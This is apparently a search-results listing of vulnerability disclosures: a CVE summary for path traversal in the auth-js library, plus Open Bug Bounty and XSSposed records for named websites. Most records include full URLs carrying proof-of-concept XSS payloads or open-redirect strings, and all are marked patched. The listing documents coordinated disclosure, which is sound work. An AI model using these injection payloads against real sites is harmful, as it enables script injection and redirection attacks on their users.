25 matches found
CVE-2025-48370 auth-js Vulnerable to Insecure Path Routing from Malformed User Input
auth-js is an isomorphic Javascript library for Supabase Auth. Prior to version 2.70.0, the library functions getUserById, deleteUser, updateUserById, listFactors and deleteFactor did not require the user supplied values to be valid UUIDs. This could lead to a URL path traversal, resulting in the...
All Vulnerabilities for sistemaseducaciononline.uta.edu.ec Patched via Open Bug Bounty
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Affected Website:| sistemaseducaciononline.uta.edu.ec...
All Vulnerabilities for eva.eduper.udelar.edu.uy Patched via Open Bug Bounty
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Affected Website:| eva.eduper.udelar.edu.uy ---|--- Open B...
All Vulnerabilities for japanesecartrade.com Patched via Open Bug Bounty
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Affected Website:| japanesecartrade.com ---|--- Open Bug...
magic.xooma-today.bz XSS vulnerability
Vulnerable URL: http://magic.xooma-today.bz/blog/index.html?idarticle=%27%22%3E%3Csvg/onload=confirm/OPENBUGBOUNTY/%3Epage=selarticle Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP...
178.79.155.64 XSS vulnerability
Vulnerable URL: http://178.79.155.64/search/?searchType=all=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&submit.x;=0&submit.y;=0 Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 12:10 GMT Vulnerability type:| XSS Vulnerability...
theboltonnews.co.uk XSS vulnerability
Open Bug Bounty ID: OBB-178095 Description| Value ---|--- Affected Website:| theboltonnews.co.uk Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Che...
leonardbernstein.com XSS vulnerability
Vulnerable URL: http://www.leonardbernstein.com/news.php?newsphp=&news.php;==11%22--%3E%3C/script%3E%3Csvg/onload=%27;alert%28/OPENBUGBOUNTY/%29;%27%3E Details: Description| Value ---|--- Patched:| Yes, at 18.06.2017 Latest check for patch:| 18.06.2017 14:46 GMT Vulnerability type:| XSS...
hhgregg.com XSS vulnerability
Vulnerable URL: http://www.hhgregg.com/PromoDescView?name=modal=%20= Details: Description| Value ---|--- Patched:| Yes, at 28.12.2016 Latest check for patch:| 28.12.2016 13:14 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 7577 Google Pagerank| 5 VIP website...
search.com XSS vulnerability
Vulnerable URL: https://www.search.com/web?q=%22%3E%3Csvg%2Fonload%3Dalert%28%2Fxssposed%2F%29%3E=homeSearchBox Details: Description| Value ---|--- Patched:| Yes, at 24.05.2016 Latest check for patch:| 24.05.2016 19:55 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa...
stmary.edu XSS vulnerability
Vulnerable URL: http://stmary.edu/Search.aspx?searchtext=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 26.07.2017 Latest check for patch:| 26.07.2017 15:57 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 3604...
unblocked.me Open Redirect vulnerability
Vulnerable URL: http://unblocked.me/counthits.php?url=https://www.xssposed.org/ Details: Description| Value ---|--- Patched:| Yes, at 23.11.2017 Latest check for patch:| 23.11.2017 20:16 GMT Vulnerability type:| Open Redirect Vulnerability status:| Publicly disclosed Alexa Rank| 3166472 Google...
one.sail-world.com vulnerability
Vulnerable URL: http://one.sail-world.com/golink.cfm?srcid=15=105646=https://www.xssposed.org/ Details: Description| Value ---|--- Patched:| Yes, at 17.03.2016 Latest check for patch:| 17.03.2016 14:12 GMT Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google...
daft.ie XSS vulnerability
Vulnerable URL: http://www.daft.ie/searchtenants.daft?s%5Bcid%5D=1%5Baid%5D=%5Bbedrooms%5D=0%5Brent%5D=6666820129%5Bmoveindate%5D=0search=Find%20Tenants%20%C2%BB Details: Description| Value ---|--- Patched:| Yes, at 31.03.2016 Latest check for patch:| 31.03.2016 12:12 GMT Vulnerability type:| XSS...
epoq.co.uk XSS vulnerability
Vulnerable URL: http://www.epoq.co.uk/ep/popup-press.cfm?image=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 23.11.2017 Latest check for patch:| 23.11.2017 10:06 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank...
bicyclewarehouse.com XSS vulnerability
Vulnerable URL: http://www.bicyclewarehouse.com/sitesearch.cfm?search=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FXSSPOSED%2F%29%3E&goSiteSearch.x;=0&goSiteSearch.y;=0 Details: Description| Value ---|--- Patched:| Yes, at 25.01.2016 Latest check for patch:| 25.01.2016 15:39 GMT Vulnerability type:| XSS...
learner.lincs.ed.gov vulnerability
Vulnerable URL: https://learner.lincs.ed.gov/clicktrack/?nid=50=https://www.xssposed.org Details: Description| Value ---|--- Patched:| Yes, at 21.12.2015 Latest check for patch:| 21.12.2015 16:07 GMT Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0...
oakhousestudio.com XSS vulnerability
Vulnerable URL: http://www.oakhousestudio.com/shop/basketnew.php?pagefile=" Details: Description| Value ---|--- Patched:| Yes, at 07.12.2015 Latest check for patch:| 07.12.2015 16:30 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google...
motolanna.com XSS vulnerability
Vulnerable URL: http://www.motolanna.com/shop/search.php?q=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FXSSPOSED%2F%29%3E=Search Details: Description| Value ---|--- Patched:| Yes, at 06.12.2015 Latest check for patch:| 06.12.2015 07:22 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...
usd218.org XSS vulnerability
Vulnerable URL: http://www.usd218.org/cs/forgot.v Details: Description| Value ---|--- Patched:| Yes, at 29.11.2015 Latest check for patch:| 29.11.2015 12:55 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 8220070 Google Pagerank| 4 VIP website status:| No Check...